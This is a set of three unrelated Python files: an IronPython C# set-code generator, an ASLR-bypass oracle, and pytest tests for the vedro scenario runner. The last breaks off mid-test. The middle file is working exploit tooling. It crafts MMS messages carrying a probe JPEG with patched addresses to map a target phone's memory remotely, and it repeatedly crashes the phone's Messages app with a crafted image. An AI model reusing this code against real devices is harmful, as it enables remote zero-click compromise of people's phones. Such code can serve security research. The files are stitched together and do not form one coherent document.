    other = get_type(not mutable)
    return [own, other, 'object?']
def get_clrname(name):
    """Convert a snake_case Python name into a CLR PascalCase name."""
    return ''.join(part.capitalize() for part in name.split('_'))
def get_items(arg_t):
    """C# expression yielding the SetStorage of an argument of type arg_t."""
    if arg_t != 'object?':
        # A typed set exposes its storage field directly.
        return 'set._items'
    return 'SetStorage.GetItems(set)'
def copy(cw, mutable):
    """Emit a copy statement: mutable sets clone, frozen sets share storage."""
    stmt = 'return copy();' if mutable else 'return Make(_items);'
    cw.writeline(stmt)
def copy_op(cw, mutable, name):
    """Emit a zero-argument operation that just copies the set."""
    cw.enter_block('public %s %s()' % (get_type(mutable), name))
    copy(cw, mutable)
    cw.exit_block()
    cw.writeline()
def simple_op(cw, t, arg_t, name):
    """Emit a one-argument set operation returning a new set.

    Fix: removed the unused local `clrname` (simple_op_worker computes it
    itself); the call to get_clrname here had no effect.
    """
    cw.enter_block('public %s %s(%s set)' % (t, name, add_not_null(arg_t)))
    simple_op_worker(cw, t, arg_t, name)
    cw.exit_block()
    cw.writeline()
def simple_op_worker(cw, t, arg_t, name):
    """Emit the body of a binary set operation for the given argument type."""
    clr = get_clrname(name)
    if arg_t != 'object?':
        # Typed argument: storage is directly accessible.
        cw.writeline(
            'return Make(SetStorage.%s(_items, set._items));' % clr
        )
        return
    # object argument: extract or build a SetStorage, then combine.
    cw.writeline('SetStorage items;')
    cw.enter_block('if (SetStorage.GetItems(set, out items))')
    cw.writeline('items = SetStorage.%s(_items, items);' % clr)
    cw.else_block()
    cw.writeline('items.%sUpdate(_items);' % clr)
    cw.exit_block()
    cw.writeline('return Make(items);')
def enter_multiarg_op(cw, t, name):
    """Open a params-array overload accepting any number of sets."""
    signature = 'public %s %s([NotNull] params object[]/*!*/ sets)' % (t, name)
    cw.enter_block(signature)
def union_multiarg(cw, mutable):
    """Emit the params-array union overload: clone, then UnionUpdate per set."""
    t = get_type(mutable)
    enter_multiarg_op(cw, t, 'union')
    cw.writeline('SetStorage res = _items.Clone();')
    cw.enter_block('foreach (object set in sets)')
    cw.writeline('res.UnionUpdate(SetStorage.GetItems(set));')
    cw.exit_block()
    cw.writeline()
    cw.writeline('return Make(res);')
    cw.exit_block()
    cw.writeline()
def intersection_multiarg(cw, mutable):
    """Emit the params-array intersection overload.

    The generated C# intersects pairwise, sorting operands by size and
    cloning before the first in-place update so _items is never mutated.
    """
    t = get_type(mutable)
    enter_multiarg_op(cw, t, 'intersection')
    # No arguments: intersection is just a copy.
    cw.enter_block('if (sets.Length == 0)')
    copy(cw, mutable)
    cw.exit_block()
    cw.writeline()
    cw.writeline('SetStorage res = _items;')
    cw.enter_block('foreach (object set in sets)')
    cw.writeline('SetStorage items, x = res, y;')
    cw.enter_block('if (SetStorage.GetItems(set, out items))')
    cw.writeline('y = items;')
    cw.writeline('SetStorage.SortBySize(ref x, ref y);')
    cw.writeline()
    cw.enter_block('if (%s(x, items) || %s(x, _items))' %
                   (('object.ReferenceEquals',) * 2))
    cw.writeline('x = x.Clone();')
    cw.exit_block()
    cw.else_block()
    cw.writeline('y = items;')
    cw.writeline('SetStorage.SortBySize(ref x, ref y);')
    cw.writeline()
    cw.enter_block('if (object.ReferenceEquals(x, _items))')
    cw.writeline('x = x.Clone();')
    cw.exit_block()
    cw.exit_block()
    cw.writeline('x.IntersectionUpdate(y);')
    cw.writeline('res = x;')
    cw.exit_block()
    cw.writeline()
    cw.writeline('Debug.Assert(!object.ReferenceEquals(res, _items));')
    cw.writeline('return Make(res);')
    cw.exit_block()
    cw.writeline()
def difference(cw, t, arg_t):
    """Emit the one-argument difference; same-type self-difference
    short-circuits to Empty."""
    items = get_items(arg_t)
    cw.enter_block('public %s difference(%s set)' % (t, add_not_null(arg_t)))
    if (t == arg_t):
        cw.enter_block('if (object.ReferenceEquals(set, this))')
        cw.writeline('return Empty;')
        cw.exit_block()
        cw.writeline()
    cw.writeline('return Make(')
    cw.indent()
    cw.writeline('SetStorage.Difference(_items, %s)' % items)
    cw.dedent()
    cw.writeline(');');
    cw.exit_block()
    cw.writeline()
def difference_multiarg(cw, mutable):
    """Emit the params-array difference overload.

    The generated C# subtracts each set in turn, short-circuiting to Empty
    if `this` appears among the arguments.
    """
    t = get_type(mutable)
    enter_multiarg_op(cw, t, 'difference')
    # No arguments: difference is just a copy.
    cw.enter_block('if (sets.Length == 0)')
    copy(cw, mutable)
    cw.exit_block()
    cw.writeline()
    cw.writeline('SetStorage res = _items;')
    cw.enter_block('foreach (object set in sets)')
    cw.enter_block('if (object.ReferenceEquals(set, this))')
    cw.writeline('return Empty;')
    cw.exit_block()
    cw.writeline()
    cw.writeline('SetStorage items = SetStorage.GetItems(set);')
    cw.enter_block('if (object.ReferenceEquals(res, _items))')
    cw.writeline('res = SetStorage.Difference(_items, items);')
    cw.else_block()
    cw.writeline('res.DifferenceUpdate(items);')
    cw.exit_block()
    cw.exit_block()
    cw.writeline()
    cw.writeline('Debug.Assert(!object.ReferenceEquals(res, _items));')
    cw.writeline('return Make(res);')
    cw.exit_block()
    cw.writeline()
def symmetric_difference(cw, t, arg_t):
    """Emit symmetric_difference; same-type self-difference short-circuits
    to Empty, otherwise defers to the generic binary-op body."""
    cw.enter_block('public %s symmetric_difference(%s set)' % (t, add_not_null(arg_t)))
    if (t == arg_t):
        cw.enter_block('if (object.ReferenceEquals(set, this))')
        cw.writeline('return Empty;')
        cw.exit_block()
        cw.writeline()
    simple_op_worker(cw, t, arg_t, 'symmetric_difference')
    cw.exit_block()
    cw.writeline()
def gen_setops(mutable):
    """Return a generator function emitting the non-operator set methods
    (isdisjoint/issubset/issuperset/union/intersection/difference/
    symmetric_difference) for the given set variant."""
    def _gen_setops(cw):
        t = get_type(mutable)
        arg_ts = get_arg_ts(mutable)
        for arg_t in arg_ts:
            items = get_items(arg_t)
            cw.enter_block('public bool isdisjoint(%s set)' % add_not_null(arg_t))
            cw.writeline('return _items.IsDisjoint(%s);' % items)
            cw.exit_block()
            cw.writeline()
        for arg_t in arg_ts:
            items = get_items(arg_t)
            cw.enter_block('public bool issubset(%s set)' % add_not_null(arg_t))
            cw.writeline('return _items.IsSubset(%s);' % items)
            cw.exit_block()
            cw.writeline()
        for arg_t in arg_ts:
            items = get_items(arg_t)
            cw.enter_block('public bool issuperset(%s set)' % add_not_null(arg_t))
            # superset(a, b) == subset(b, a); operands are swapped.
            cw.writeline('return %s.IsSubset(_items);' % items)
            cw.exit_block()
            cw.writeline()
        copy_op(cw, mutable, 'union')
        for arg_t in arg_ts:
            simple_op(cw, t, arg_t, 'union')
        union_multiarg(cw, mutable)
        copy_op(cw, mutable, 'intersection')
        for arg_t in arg_ts:
            simple_op(cw, t, arg_t, 'intersection')
        intersection_multiarg(cw, mutable)
        copy_op(cw, mutable, 'difference')
        for arg_t in arg_ts:
            difference(cw, t, arg_t)
        difference_multiarg(cw, mutable)
        for arg_t in arg_ts:
            symmetric_difference(cw, t, arg_t)
    return _gen_setops
# Parallel tables for the four binary set operators: C# operator symbol,
# Python method name, in-place (update) method name, CLR operator method name.
op_symbols = [ '|', '&', '^', '-' ]
op_names = [ 'union', 'intersection', 'symmetric_difference', 'difference' ]
op_upnames = [ 'update' ] + [x + '_update' for x in op_names[1:]]
op_clrnames = [ 'BitwiseOr', 'BitwiseAnd', 'ExclusiveOr', 'Subtract' ]
def gen_op(cw, t_left, t_right, symbol, name):
    """Emit a binary operator overload forwarding to the named method."""
    header = ('public static %s operator %s(%s x, %s y)' %
              (t_left, symbol, add_not_null(t_left), add_not_null(t_right)))
    cw.enter_block(header)
    cw.writeline('return x.%s(y);' % name)
    cw.exit_block()
    cw.writeline()
def gen_ops(mutable):
    """Return a generator emitting operator overloads against both the
    same set type and the opposite variant."""
    def _gen_ops(cw):
        own = get_type(mutable)
        other = get_type(not mutable)
        # First all operators for (own, own), then all for (own, other).
        for right in (own, other):
            for symbol, name in zip(op_symbols, op_names):
                gen_op(cw, own, right, symbol, name)
    return _gen_ops
def gen_mutating_op(cw, t, arg_t, symbol, upname, clrname):
    """Emit an in-place operator (InPlaceX) that updates and returns this.

    For an object argument, the generated C# first type-checks against both
    set variants and throws a Python TypeError for unsupported operands.
    """
    cw.writeline('[SpecialName]')
    cw.enter_block('public %s InPlace%s(%s set)' % (t, clrname, add_not_null(arg_t)))
    if arg_t == 'object?':
        cw.enter_block(
            'if (set is %s || set is %s)' %
            tuple(map(get_type, [False, True]))
        )
    cw.writeline('%s(set);' % upname)
    cw.writeline('return this;')
    if arg_t == 'object?':
        cw.exit_block()
        cw.writeline()
        cw.writeline('throw PythonOps.TypeError(')
        cw.indent()
        cw.writeline(
            '''"unsupported operand type(s) for %s=: '{0}' and '{1}'",''' %
            symbol
        )
        cw.writeline('%s(this), %s(set)' % (('PythonOps.GetPythonTypeName',) * 2))
        cw.dedent()
        cw.writeline(');')
    cw.exit_block()
    cw.writeline()
def gen_mutating_ops(cw):
    """Emit every in-place operator for the mutable set type."""
    mutable_t = get_type(True)
    for symbol, upname, clrname in zip(op_symbols, op_upnames, op_clrnames):
        for arg_t in get_arg_ts(True):
            gen_mutating_op(cw, mutable_t, arg_t, symbol, upname, clrname)
# Rich-comparison operators generated for subset/superset semantics.
compares = [ '>', '<', '>=', '<=' ]
def is_subset(compare):
    """True for the comparisons ('<', '<=') that test subset-ness."""
    return compare in ('<', '<=')
def is_strict(compare):
    """True when the comparison has no '=' suffix (strict < or >)."""
    return compare[-1:] != '='
def gen_comparison(cw, t, compare):
    """Emit one rich-comparison operator mapping to subset/superset tests."""
    cw.writeline('[return: MaybeNotImplemented]')
    cw.enter_block(
        'public static object operator %s([NotNull] %s self, object? other)' %
        (compare, t)
    )
    cw.enter_block('if (SetStorage.GetItemsIfSet(other, out SetStorage items))')
    # Subset tests put self on the left; superset tests swap the operands.
    if is_subset(compare):
        left = 'self._items'
        right = 'items'
    else:
        left = 'items'
        right = 'self._items'
    if is_strict(compare):
        func = 'IsStrictSubset'
    else:
        func = 'IsSubset'
    cw.writeline('return %s.%s(%s);' % (left, func, right))
    cw.exit_block()
    cw.writeline()
    # Non-set operand: let Python fall back to the reflected operation.
    cw.writeline('return NotImplementedType.Value;')
    cw.exit_block()
    cw.writeline()
def suppress(cw, *msgs):
    """Emit a [SuppressMessage(...), ...] attribute line, or nothing if no
    messages are given."""
    if not msgs:
        return
    attrs = ('System.Diagnostics.CodeAnalysis.SuppressMessage(%s)' % m
             for m in msgs)
    # ' ,' (not ', ') matches the separator the original generator emitted.
    cw.writeline('[' + ' ,'.join(attrs) + ']')
def gen_comparisons(cw, t):
    """Emit the IRichComparable region: one operator per comparison."""
    cw.writeline('#region IRichComparable')
    cw.writeline()
    for op in compares:
        gen_comparison(cw, t, op)
    cw.writeline('#endregion')
    cw.writeline()
def gen_ienumerable(cw, mutable):
    """Emit the IEnumerable and IEnumerable<object?> GetEnumerator regions.

    The SetIterator's second argument is a C# bool literal indicating
    whether the set is mutable.
    """
    cw.writeline('#region IEnumerable Members')
    cw.writeline()
    cw.enter_block('IEnumerator IEnumerable.GetEnumerator()')
    cw.writeline('return new SetIterator(_items, %s);' % str(mutable).lower())
    cw.exit_block()
    cw.writeline()
    cw.writeline('#endregion')
    cw.writeline()
    cw.writeline('#region IEnumerable<object?> Members')
    cw.writeline()
    cw.enter_block('IEnumerator<object?> IEnumerable<object?>.GetEnumerator()')
    cw.writeline('return new SetIterator(_items, %s);' % str(mutable).lower())
    cw.exit_block()
    cw.writeline()
    cw.writeline('#endregion')
    cw.writeline()
def gen_icodeformattable(cw):
    """Emit the ICodeFormattable region implementing __repr__."""
    w = cw.writeline
    w('#region ICodeFormattable Members')
    w()
    cw.enter_block('public virtual string/*!*/ __repr__(CodeContext/*!*/ context)')
    w('return SetStorage.SetToString(context, this, _items);')
    cw.exit_block()
    w()
    w('#endregion')
    w()
def gen_icollection(cw):
    """Emit the ICollection region: CopyTo, Count, IsSynchronized, SyncRoot."""
    cw.writeline('#region ICollection Members')
    cw.writeline()
    cw.enter_block('void ICollection.CopyTo(Array array, int index)')
    cw.writeline('int i = 0;')
    cw.enter_block('foreach (var o in this)')
    cw.writeline('array.SetValue(o, index + i++);')
    cw.exit_block()
    cw.exit_block()
    cw.writeline()
    cw.enter_block('public int Count')
    cw.writeline('[PythonHidden]')
    cw.writeline('get { return _items.Count; }')
    cw.exit_block()
    cw.writeline()
    cw.enter_block('bool ICollection.IsSynchronized')
    cw.writeline('get { return false; }')
    cw.exit_block()
    cw.writeline()
    cw.enter_block('object ICollection.SyncRoot')
    cw.writeline('get { return this; }')
    cw.exit_block()
    cw.writeline()
    cw.writeline('#endregion')
    cw.writeline()
def gen_iweakreferenceable(cw):
    """Emit the IWeakReferenceable region backed by a _tracker field."""
    cw.writeline('#region IWeakReferenceable Members')
    cw.writeline()
    cw.writeline('private WeakRefTracker? _tracker;')
    cw.writeline()
    cw.enter_block('WeakRefTracker? IWeakReferenceable.GetWeakRef()')
    cw.writeline('return _tracker;')
    cw.exit_block()
    cw.writeline()
    cw.enter_block('bool IWeakReferenceable.SetWeakRef(WeakRefTracker value)')
    # CompareExchange makes the first SetWeakRef win atomically.
    cw.writeline('return Interlocked.CompareExchange(ref _tracker, value, null) == null;')
    cw.exit_block()
    cw.writeline()
    cw.enter_block('void IWeakReferenceable.SetFinalizer(WeakRefTracker value)')
    cw.writeline('_tracker = value;')
    cw.exit_block()
    cw.writeline()
    cw.writeline('#endregion')
    cw.writeline()
def gen_interfaces(mutable):
    """Return a generator emitting all interface implementations for one
    set variant."""
    def _gen_interfaces(cw):
        gen_comparisons(cw, get_type(mutable))
        gen_ienumerable(cw, mutable)
        gen_icodeformattable(cw)
        gen_icollection(cw)
        gen_iweakreferenceable(cw)
    return _gen_interfaces
def main():
    """Assemble (section title, generator) pairs for both set variants and
    run the code generator."""
    generators = [
        ('NonOperator Operations', gen_setops),
        ('Operators', gen_ops),
        ('Interface Implementations', gen_interfaces),
    ]
    mutable_generators = [
        ('Mutating Operators', gen_mutating_ops),
    ]
    # Each titled section is instantiated once per variant (mutable first).
    sections = [
        ('%s (%s)' % (title, get_type(bit)), factory(bit))
        for title, factory in generators
        for bit in [True, False]
    ]
    sections.extend(mutable_generators)
    return generate(*sections)
# Run the generator when invoked as a script.
if __name__ == '__main__':
    main()
|
|
from intervaltree import Interval, IntervalTree
import json
import logging
import mms
import os
import struct
import sys
import time
def PageAligned(x):
    """Return True when *x* lies on a 4 KiB page boundary."""
    return x % 0x1000 == 0
class AslrOracle:
    """Base class for page-probing ASLR oracles with a query-result cache."""

    def __init__(self):
        self.queries = 0
        self.InitCache()

    def CheckAddress(self, address):
        """Probe a single page at *address*."""
        return self.CheckRange(address, 0x1000)

    def InitCache(self):
        """Reset the cache-hit counter and the known good/bad region trees."""
        self.cached_queries = 0
        self.good_regions = IntervalTree()
        self.bad_regions = IntervalTree()

    def InsertToCache(self, start, end, valid):
        """Record the outcome of a probe of [start, end) in the cache."""
        if valid:
            # Readable regions are stored end-inclusive (+1) and kept merged.
            self.good_regions.add(Interval(start, end + 1))
            self.good_regions.merge_overlaps()
        else:
            self.bad_regions.add(Interval(start, end))

    def CheckCache(self, start, end):
        """Return a cached True/False answer for [start, end), or None on a miss."""
        for region in self.good_regions.overlap(start, end):
            if region[0] <= start and region[1] >= end:
                # Fully contained in a known-readable region.
                self.cached_queries += 1
                return True
        if self.bad_regions.envelop(start, end):
            # A known-unreadable region lies entirely inside the queried range.
            self.cached_queries += 1
            return False
        return None
class TestAslrOracle(AslrOracle):
    """Offline oracle backed by a /proc-style maps dump, for local testing."""

    def __init__(self, maps_file):
        AslrOracle.__init__(self)
        self.AslrBaseAddr = 0x6f00000000
        self.AslrEndAddr = 0x8000000000
        self.valid_pages = set()
        with open(maps_file, "r") as f:
            for raw_line in f:
                fields = raw_line.split()
                bounds = fields[0].split('-')
                start_addr = int(bounds[0], 16)
                end_addr = int(bounds[1], 16)
                perms = fields[1][:3]
                # Only track mappings inside the ASLR window of interest.
                if start_addr < self.AslrBaseAddr or end_addr >= self.AslrEndAddr:
                    continue
                if perms[0] == 'r':
                    self.valid_pages.update(range(start_addr, end_addr, 0x1000))
        logging.info("Found %d readable pages" % len(self.valid_pages))

    def CheckRange(self, address, length):
        """Return True iff every page of [address, address+length) is readable."""
        assert(PageAligned(address))
        # Round the length up to a whole number of pages.
        length = (length + 0xfff) & (~0xfff)
        self.queries += 1
        cached = self.CheckCache(address, address + length)
        if cached != None:
            return cached
        result = all(page in self.valid_pages
                     for page in range(address, address + length, 0x1000))
        self.InsertToCache(address, address + length, result)
        return result
class MmsAslrOracle(AslrOracle):
    """ASLR oracle that probes a remote target's address space over MMS.

    Each probe is a crafted MMS carrying an (address, page-count) pair;
    whether a delivery receipt arrives within `receipt_wait_time` is used
    as the readable/unreadable signal for the probed range.
    """

    def __init__(self, config_file):
        AslrOracle.__init__(self)
        # Load configuration from disk.
        self.LoadConfig(config_file)
        # Initialize the MMS client object.
        self.mms = mms.MmsClient(self.hostname, self.username, self.password,
                                 self.mms_in_dir)
        # Send an empty test MMS to check that everything works correctly on the
        # MMSC side, and that the target phone is online.
        logging.info("Sending test MMS to check if the device is online...")
        received = self.mms.Send(self.phone_number,
                                 [("test.txt", "", "text/plain")],
                                 receipt_wait_time = self.receipt_wait_time)
        if received:
            logging.info("Received ack, phone is up and the setup works.")
        else:
            logging.error("Message was not sent or received by the target, please "
                          "make sure that your MMSC server is working correctly and "
                          "the target phone is logged in the network.")
            sys.exit(1)
        logging.info("Crashing the Messages app remotely now to get a clean state "
                     "for further exploitation.")
        self.CrashMessages()

    def LoadConfig(self, config_file):
        """Read the JSON config and the crashing/probe sample payloads.

        Sets connection parameters, raw sample bytes, the byte offsets at
        which the probed address/size get patched in, and timing knobs.
        """
        with open(config_file, "r") as f:
            config = json.loads(f.read())
        self.phone_number = config["phone_number"]
        self.hostname = config["hostname"]
        self.username = config["username"]
        self.password = config["password"]
        self.mms_in_dir = config["mms_in_dir"]
        assert(os.path.exists(self.mms_in_dir))
        with open(config["crashing_sample"], "rb") as f:
            self.crashing_sample = f.read()
        with open(config["probe_sample"], "rb") as f:
            self.probe_sample = f.read()
        # Offsets are hex strings in the config file.
        self.probe_address_offset = int(config["probe_address_offset"], 16)
        self.probe_size_offset = int(config["probe_size_offset"], 16)
        self.cooldown_time = float(config["cooldown_time"])
        self.receipt_wait_time = float(config["receipt_wait_time"])

    def CooldownAfterCrash(self):
        """Sleep until at least `cooldown_time` has elapsed since the last crash."""
        cur_time = time.time()
        if cur_time - self.last_crash_time < self.cooldown_time:
            delay = self.cooldown_time - (cur_time - self.last_crash_time)
            logging.debug("Cooldown, sleeping for %d seconds..." % delay)
            time.sleep(delay)
            logging.debug("Woke up, back to the action!")

    def CrashMessages(self):
        """Send the crashing sample to reset the remote app's state."""
        self.mms.Send(self.phone_number,
                      [("crash.jpg", self.crashing_sample, "image/jpeg")])
        self.last_crash_time = time.time()

    def SendProbeMMS(self, files, subject=None, text=None):
        """Send a probe MMS; return whether a delivery receipt arrived in time."""
        return self.mms.Send(self.phone_number, files, subject, text,
                             receipt_wait_time = self.receipt_wait_time)

    def CheckRange(self, address, length):
        """Return whether [address, address+length) appears readable remotely.

        Patches the probed address and page count into the probe sample and
        sends probes until one outcome leads the vote.
        """
        assert(PageAligned(address))
        # Round the length up to a whole number of 4 KiB pages.
        length = (length + 0xfff) & (~0xfff)
        region_end = address + length - 1
        self.queries += 1
        ############################################################################
        # Check the cache first
        ############################################################################
        cached = self.CheckCache(address, address + length)
        if cached != None:
            return cached
        ############################################################################
        # Construct the probe test case
        ############################################################################
        probe_sample = self.probe_sample
        # Insert the tested address into the probe sample (little-endian u64)
        probe_sample = (
            probe_sample[:self.probe_address_offset] +
            struct.pack("<Q", address) +
            probe_sample[self.probe_address_offset + 8:]
        )
        # Insert the tested length into the probe sample (little-endian u32,
        # expressed as a page count)
        probe_sample = (
            probe_sample[:self.probe_size_offset] +
            struct.pack("<I", length // 0x1000) +
            probe_sample[self.probe_size_offset + 4:]
        )
        ############################################################################
        # Send probes until we get enough confidence that the result is a valid one
        ############################################################################
        # oracle_score[False]/[True] count probes voting for each outcome; the
        # loop runs until one side leads by 1, so a single probe currently decides.
        oracle_score = [0, 0]
        probe_no = 0
        while ((oracle_score[False] - oracle_score[True] < 1) and
               (oracle_score[True] - oracle_score[False] < 1)):
            logging.debug("Range [%x .. %x], iteration %d, current oracle score: %s" %
                          (address, region_end, probe_no, oracle_score))
            self.CooldownAfterCrash()
            logging.debug("Sending probe %d..." % (probe_no + 1))
            probe_outcome = self.SendProbeMMS(
                [("probe.jpg", probe_sample, "image/jpeg")],
                subject="Testing address %x" % address
            )
            oracle_score[probe_outcome] += 1
            if probe_outcome:
                logging.debug("Probe %d returned TRUE, crashing Messages" %
                              (probe_no + 1))
                self.CrashMessages()
            else:
                logging.debug("Probe %d returned FALSE" % (probe_no + 1))
                # No crash occurred; backdate the timestamp by the receipt wait
                # we already spent, which shortens the next cooldown.
                self.last_crash_time = time.time() - self.receipt_wait_time
            probe_no += 1
        winner = (oracle_score[True] > oracle_score[False])
        logging.debug("Range [%x .. %x], iterations %d, final score %s" %
                      (address, region_end, probe_no, oracle_score))
        logging.info("Range [%x .. %x] is readable: %s" %
                     (address, region_end, winner))
        self.InsertToCache(address, address + length, winner)
        return winner
|
|
import sys
from pytest import raises
if sys.version_info >= (3, 8):
from unittest.mock import AsyncMock
else:
from asynctest.mock import CoroutineMock as AsyncMock
from unittest.mock import Mock, call
import pytest
from baby_steps import given, then, when
from vedro import Scenario
from vedro.core import Dispatcher, Runner, VirtualScenario, VirtualStep
from vedro.events import (
ExceptionRaisedEvent,
ScenarioFailedEvent,
ScenarioPassedEvent,
ScenarioRunEvent,
StepFailedEvent,
StepPassedEvent,
StepRunEvent,
)
@pytest.fixture()
def dispatcher_():
    """Dispatcher mock that records every fired event for later assertions."""
    return AsyncMock(Dispatcher())
@pytest.fixture()
def runner(dispatcher_: Dispatcher):
    """Runner wired to the mocked dispatcher fixture."""
    return Runner(dispatcher_)
@pytest.mark.asyncio
@pytest.mark.parametrize("method_mock_factory", (Mock, AsyncMock,))
async def test_runner_run_step_passed(method_mock_factory: Mock, *,
                                      runner: Runner, dispatcher_: Dispatcher):
    """A sync or async step returning normally yields a passed StepResult and
    fires StepRunEvent followed by StepPassedEvent."""
    with given:
        scenario_ = Mock(Scenario, step=method_mock_factory(return_value=None))
        step = VirtualStep(scenario_.step)
    with when:
        step_result = await runner.run_step(step, scenario_)
    with then:
        assert scenario_.mock_calls == [call.step(scenario_)]
        assert step_result.is_passed() is True
        assert step_result.exc_info is None
        assert isinstance(step_result.started_at, float)
        assert isinstance(step_result.ended_at, float)
        assert dispatcher_.mock_calls == [
            call.fire(StepRunEvent(step_result)),
            call.fire(StepPassedEvent(step_result)),
        ]
@pytest.mark.asyncio
@pytest.mark.parametrize("method_mock_factory", (Mock, AsyncMock))
async def test_runner_run_step_failed(method_mock_factory: Mock, *,
                                      runner: Runner, dispatcher_: Dispatcher):
    """A step raising AssertionError yields a failed StepResult and fires
    StepRun -> ExceptionRaised -> StepFailed."""
    with given:
        exception = AssertionError()
        scenario_ = Mock(Scenario, step=method_mock_factory(side_effect=exception))
        step = VirtualStep(scenario_.step)
    with when:
        step_result = await runner.run_step(step, scenario_)
    # Fixed: the assertion block was wrapped in `given` instead of `then`,
    # inconsistent with the given/when/then structure of the sibling tests.
    with then:
        assert scenario_.mock_calls == [call.step(scenario_)]
        assert step_result.is_failed() is True
        assert step_result.exc_info.value == exception
        assert isinstance(step_result.started_at, float)
        assert isinstance(step_result.ended_at, float)
        assert dispatcher_.mock_calls == [
            call.fire(StepRunEvent(step_result)),
            call.fire(ExceptionRaisedEvent(step_result.exc_info)),
            call.fire(StepFailedEvent(step_result)),
        ]
@pytest.mark.asyncio
@pytest.mark.parametrize("method_mock_factory", (Mock, AsyncMock))
async def test_runner_run_step_interrupted(*, method_mock_factory: Mock, dispatcher_: Dispatcher):
    """An exception listed in `interrupt_exceptions` propagates out of run_step."""
    with given:
        interrupt_exception = KeyboardInterrupt
        scenario_ = Mock(Scenario, step=method_mock_factory(side_effect=interrupt_exception))
        virtual_step = VirtualStep(scenario_.step)
        runner = Runner(dispatcher_, interrupt_exceptions=(interrupt_exception,))
    with when, raises(BaseException) as exception:
        await runner.run_step(virtual_step, scenario_)
    # Fixed: the assertion block was wrapped in `given` instead of `then`,
    # inconsistent with the given/when/then structure of the sibling tests.
    with then:
        assert exception.type is interrupt_exception
        assert scenario_.mock_calls == [call.step(scenario_)]
@pytest.mark.asyncio
async def test_runner_run_scenario_no_steps_passed(*, runner: Runner, dispatcher_: Dispatcher):
    """A scenario with no steps passes and fires ScenarioRun -> ScenarioPassed."""
    with given:
        scenario_ = Mock(Scenario, step=Mock(return_value=None), __file__="/tmp/scenario.py")
        virtual_scenario = VirtualScenario(scenario_, [])
    with when:
        scenario_result = await runner.run_scenario(virtual_scenario)
    with then:
        assert scenario_result.is_passed() is True
        assert isinstance(scenario_result.started_at, float)
        assert isinstance(scenario_result.ended_at, float)
        assert dispatcher_.mock_calls == [
            call.fire(ScenarioRunEvent(scenario_result)),
            call.fire(ScenarioPassedEvent(scenario_result)),
        ]
@pytest.mark.asyncio
async def test_runner_run_scenario_single_step_passed(*, runner: Runner, dispatcher_: Dispatcher):
    """A one-step scenario passes and fires step events nested inside
    ScenarioRun/ScenarioPassed."""
    with given:
        scenario_ = Mock(Scenario, step=Mock(return_value=None), __file__="/tmp/scenario.py")
        step = VirtualStep(scenario_.step)
        virtual_scenario = VirtualScenario(scenario_, [step])
    with when:
        scenario_result = await runner.run_scenario(virtual_scenario)
    with then:
        assert scenario_result.is_passed() is True
        assert isinstance(scenario_result.started_at, float)
        assert isinstance(scenario_result.ended_at, float)
        step_results = scenario_result.step_results
        assert dispatcher_.mock_calls == [
            call.fire(ScenarioRunEvent(scenario_result)),
            call.fire(StepRunEvent(step_results[0])),
            call.fire(StepPassedEvent(step_results[0])),
            call.fire(ScenarioPassedEvent(scenario_result)),
        ]
@pytest.mark.asyncio
async def test_runner_run_scenario_single_step_failed(*, runner: Runner, dispatcher_: Dispatcher):
    """A one-step scenario whose step raises fails the scenario and fires
    StepRun -> ExceptionRaised -> StepFailed inside ScenarioRun/ScenarioFailed."""
    with given:
        exception = AssertionError()
        scenario_ = Mock(Scenario, step=Mock(side_effect=exception), __file__="/tmp/scenario.py")
        step = VirtualStep(scenario_.step)
        virtual_scenario = VirtualScenario(scenario_, [step])
    with when:
        scenario_result = await runner.run_scenario(virtual_scenario)
    with then:
        assert scenario_result.is_failed() is True
        assert isinstance(scenario_result.started_at, float)
        assert isinstance(scenario_result.ended_at, float)
        step_results = scenario_result.step_results
        assert dispatcher_.mock_calls == [
            call.fire(ScenarioRunEvent(scenario_result)),
            call.fire(StepRunEvent(step_results[0])),
            call.fire(ExceptionRaisedEvent(step_results[0].exc_info)),
            call.fire(StepFailedEvent(step_results[0])),
            call.fire(ScenarioFailedEvent(scenario_result)),
        ]
@pytest.mark.asyncio
async def test_runner_run_scenario_multiple_steps_passed(*, runner: Runner,
                                                         dispatcher_: Dispatcher):
    """Both steps of a two-step scenario run in order; the scenario passes."""
    with given:
        scenario_ = Mock(Scenario, __file__="/tmp/scenario.py",
                         first_step=Mock(return_value=None),
                         second_step=Mock(return_value=None))
        first_step = VirtualStep(scenario_.first_step)
        second_step = VirtualStep(scenario_.second_step)
        virtual_scenario = VirtualScenario(scenario_, [first_step, second_step])
    with when:
        scenario_result = await runner.run_scenario(virtual_scenario)
    with then:
        assert scenario_result.is_passed() is True
        assert isinstance(scenario_result.started_at, float)
        assert isinstance(scenario_result.ended_at, float)
        first_step_result = scenario_result.step_results[0]
        second_step_result = scenario_result.step_results[1]
        assert dispatcher_.mock_calls == [
            call.fire(ScenarioRunEvent(scenario_result)),
            call.fire(StepRunEvent(first_step_result)),
            call.fire(StepPassedEvent(first_step_result)),
            call.fire(StepRunEvent(second_step_result)),
            call.fire(StepPassedEvent(second_step_result)),
            call.fire(ScenarioPassedEvent(scenario_result)),
        ]
@pytest.mark.asyncio
async def test_runner_run_scenario_multiple_steps_failed():
    """When the second of three steps fails, the scenario fails and the third
    step never runs (no events are fired for it)."""
    with given:
        # Built inline rather than via fixtures, since this test has no params.
        dispatcher = AsyncMock(Dispatcher)
        runner = Runner(dispatcher)
        exception = AssertionError()
        scenario_ = Mock(Scenario, __file__="/tmp/scenario.py",
                         first_step=Mock(return_value=None),
                         second_step=Mock(side_effect=exception),
                         third_step=Mock(return_value=None))
        first_step = VirtualStep(scenario_.first_step)
        second_step = VirtualStep(scenario_.second_step)
        third_step = VirtualStep(scenario_.third_step)
        scenario = VirtualScenario(scenario_, [first_step, second_step, third_step])
    with when:
        scenario_result = await runner.run_scenario(scenario)
    with then:
        assert scenario_result.is_failed() is True
        assert isinstance(scenario_result.started_at, float)
        assert isinstance(scenario_result.ended_at, float)
        first_step_result = scenario_result.step_results[0]
        second_step_result = scenario_result.step_results[1]
        assert dispatcher.mock_calls == [
            call.fire(ScenarioRunEvent(scenario_result)),
            call.fire(StepRunEvent(first_step_result)),
            call.fire(StepPassedEvent(first_step_result)),
            call.fire(StepRunEvent(second_step_result)),
            call.fire(ExceptionRaisedEvent(second_step_result.exc_info)),
            call.fire(StepFailedEvent(second_step_result)),
            call.fire(ScenarioFailedEvent(scenario_result)),
        ]
@pytest.mark.asyncio
async def test_runner_interrupted_scenario(*, dispatcher_: Dispatcher):
    """An interrupt exception raised by a step propagates out of run_scenario."""
    with given:
        interrupt_exception = KeyboardInterrupt
        runner = Runner(dispatcher_, interrupt_exceptions=(interrupt_exception,))
